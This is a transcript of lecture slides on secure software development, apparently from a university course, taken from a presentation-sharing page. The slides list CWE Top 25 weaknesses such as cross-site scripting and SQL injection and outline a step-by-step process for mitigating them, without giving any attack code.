Presentation is loading. Please wait.

Presentation is loading. Please wait.

Secure Software Development Mini Zeng University of Alabama in Huntsville 1.

Published byClifton James Modified over 8 years ago

Similar presentations

Presentation on theme: "Secure Software Development Mini Zeng University of Alabama in Huntsville 1."— Presentation transcript:

1 Secure Software Development Mini Zeng University of Alabama in Huntsville 1

2 Outline  Introduction  Sample project ShareAlbum  Step by step instructions  Errors and mitigations  Discussion 2

3 Introduction Common Weakness Enumeration (CWE) provides a unified, measurable set of software weaknesses. The 2011 CWE/SANS Top 25 Most Dangerous Software Errors is a list of the most widespread and critical errors that can lead to serious vulnerabilities in software. 3

4 Step by step instructions: STEP 1 STEP 1 Go through the CWE website and identify potential software errors that exist in the program according to brief list of Top 25 Most Dangerous Software Errors. Automatic tools such as RIPS could be used to establish a raw error list. CWE-79: Cross-site Scripting CWE-89: SQL Injection CWE-862: Missing Authorization CWE-798: Use of Hard-coded Credentials CWE-311: Missing Encryption of Sensitive Data CWE-434: Unrestricted Upload of File with Dangerous Type CWE-22: Path Traversal CWE-759: Use of a One-Way Hash without a Salt CWE-327: Use of a Broken or Risky Cryptographic Algorithm 4

5 Step by Step Instructions: STEP 2 STEP 2 For each error, check summary to find out errors with high attacker awareness, often attack frequency and low or medium prevent cost to fix in the first place. 5

6 Step by Step Instructions: Example 6

7 Step by Step Instructions: STEP 3 STEP 3 Check the Technique Details sections of the errors. Select the list of the errors to mitigate. Check the applicable platform part to find out if the error is applicable for your application. Check the code examples in the technical details. Often, they are helpful. STEP 4 Decide mitigation approaches and document the list of errors to fix, go through all your project code to mitigate them. 7

8 Errors and Mitigations: CWE-79 CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') If you are not careful, attackers may inject javascript or other browser executable script into your web page 8

9 Errors and Mitigations: CWE-89 CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') If attackers can influence the SQL that you use to communicate with your database, then suddenly all your fun and profit belongs to them. 9

10 Errors and Mitigations: CWE-862 CWE-862 Missing Authorization : Users are often assigned different privileges. Programmers did not check the authentication to make sure that the user is authenticated to make some action. 10

11 Discussions  CWE-22: Improper limitation of a pathname to a restricted directory ('Path Traversal').  CWE-434: Unrestricted upload of file with dangerous type.  CWE-311: Missing encryption of sensitive data.  CWE-798: Use hard-code credentials may be convenient to our coding.  CWE-759: Use of a one-way hash without a salt.  CWE-327: Use of a broken or risky cryptographic algorithm. 11

12 12

Download ppt "Secure Software Development Mini Zeng University of Alabama in Huntsville 1."

Similar presentations

Preventing Web Application Injections with Complementary Character Coding Raymond Mui Phyllis Frankl Polytechnic Institute of NYU Presented at ESORICS.

Preventing Web Application Injections with Complementary Character Coding Raymond Mui Phyllis Frankl Polytechnic Institute of NYU Presented at ESORICS.
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
SEC835 OWASP Top Ten Project.

SEC835 OWASP Top Ten Project.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,

Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,
CERN – European Organization for Nuclear Research GS Department – Administrative Information Services Secure software development for the World Wide Web.

CERN – European Organization for Nuclear Research GS Department – Administrative Information Services Secure software development for the World Wide Web.
An Evaluation of the Google Chrome Extension Security Architecture

An Evaluation of the Google Chrome Extension Security Architecture
Professor Michael J. Losacco CIS 1150 – Introduction to Computer Information Systems Programming and Languages Chapter 13.

Professor Michael J. Losacco CIS 1150 – Introduction to Computer Information Systems Programming and Languages Chapter 13.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.

IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.

SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.
CS 290C: Formal Models for Web Software Lecture 1: Introduction Instructor: Tevfik Bultan.

CS 290C: Formal Models for Web Software Lecture 1: Introduction Instructor: Tevfik Bultan.
CERN – European Organization for Nuclear Research GS Department – Administrative Information Services Secure software development for the World Wide Web.

CERN – European Organization for Nuclear Research GS Department – Administrative Information Services Secure software development for the World Wide Web.
Geneva, Switzerland, 15-16 September 2014 ITU-T CYBEX standards for cybersecurity and data protection Youki Kadobayashi, NICT Japan Rapporteur, ITU-T Q.4/17.

Geneva, Switzerland, September 2014 ITU-T CYBEX standards for cybersecurity and data protection Youki Kadobayashi, NICT Japan Rapporteur, ITU-T Q.4/17.
Security in SQL Jon Holmes CIS 407 Fall 2007. Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.

Security in SQL Jon Holmes CIS 407 Fall Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.
09/18/06 1 Software Security Vulnerability Testing in Hostile Environment Herbert H. Thompson James A. Whittaker Florence E. Mottay.

09/18/06 1 Software Security Vulnerability Testing in Hostile Environment Herbert H. Thompson James A. Whittaker Florence E. Mottay.

Similar presentations

Ads by Google